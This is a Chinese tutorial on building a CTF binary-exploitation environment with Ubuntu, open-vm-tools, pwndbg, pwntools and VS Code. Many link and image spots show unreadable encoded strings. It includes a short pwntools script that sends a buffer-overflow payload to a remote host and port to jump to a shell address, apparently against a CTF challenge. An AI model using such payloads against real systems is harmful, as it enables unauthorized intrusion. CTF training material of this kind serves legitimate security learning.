欲想善其事必先利其器,无论是网络安全何种方向,都有自己经常用的工具环境,那么PWN也一样,拥有一个完善的工具环境,可以节约我们很多事,也不会在关键时候因为外在条件而卡壳,可谓逢山开山,逢水架桥,成为一个牛逼pwn手。
系统选择
系统选择肯定是Ubuntu了,毫无疑问,直接去linux官网下载,版本可选择近几年的,不要太老:
d09K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4U0x3I4k6X3g2T1y4e0c8W2z5e0x3H3y4U0l9^5i4K6u0W2M7r3&6Y4" />
VMware Tools
安装虚拟机,那么VMware Tools是必不可少的,但是Vmware带的闭源版本不好装,而官方文档,也给出这一点:
5ceK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4U0x3&6y4K6l9#2z5o6p5^5x3K6x3I4z5e0t1$3i4K6u0W2M7r3&6Y4" />
所以我们选择安装Open-VM-Tools:
9d8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4U0b7#2k6r3f1^5j5X3j5#2x3o6x3I4x3U0f1%4i4K6u0W2M7r3&6Y4" />
命令:sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
随后重启,在登录界面选择选xorg,wayland没有剪贴板同步和文件拖拽,现在就可以实现和主机交互:
4f2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4U0f1J5y4o6R3#2y4K6p5%4y4K6j5%4x3K6x3^5i4K6u0W2M7r3&6Y4" />
pwndbg
pwndbg是gdb一个插件,专门用来调试pwn题,新增如下功能:
命令 |
arena |
bins |
Heapbase |
heapinfo |
Parseheap |
tracemalloc |
cylic |
reabse |
stack |
retaddr |
canary |
got |
plt |
Hexdump |
安装命令:
apt install git
git clone 5b0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6H3N6$3&6V1j5X3N6Q4x3V1k6H3N6$3&6V1j5X3M7`.
随后进入pwndbg目录,运行setup.sh,开始安装:
8c5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4K6l9I4k6r3u0X3k6e0m8T1z5e0p5H3y4K6R3^5i4K6u0W2M7r3&6Y4" />
安装成功之后,我们在终端输入gdb,显示pwndbg,就证明安装成功:
440K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4K6l9^5y4r3t1J5j5U0u0S2x3K6l9#2x3U0R3%4i4K6u0W2M7r3&6Y4" />
pwntools
pwntools是python的一个库,经常用来写脚本,安装命令如下:
apt install python3-pip
pip install pwntools
使用示例:
from pwn import *
io =remote('61.147.171.105',63315)
bin_sh = 0x400762
My_payload = (b'a'*0xA8+p64(bin_sh))
io.sendline(My_payload)
io.interactive()
Visual Studio Code
编写脚本建议使用Visual Studio Code,直接在商店中安装,在扩展搜索chinese,进行汉化:
b1fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4K6p5$3j5K6b7J5x3h3f1^5y4o6M7&6x3e0l9@1i4K6u0W2M7r3&6Y4" />
52bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4k6#2L8s2c8G2M7q4)9J5k6h3y4G2L8g2)9J5c8X3k6A6L8r3g2K6i4K6u0r3k6r3g2X3j5i4g2D9N6q4)9J5c8U0t1H3x3U0y4Q4x3V1j5H3z5q4)9J5k6o6x3H3i4K6u0r3x3e0V1I4y4K6t1K6x3K6N6S2y4U0u0X3y4K6j5@1x3e0R3^5i4K6u0W2M7r3&6Y4" />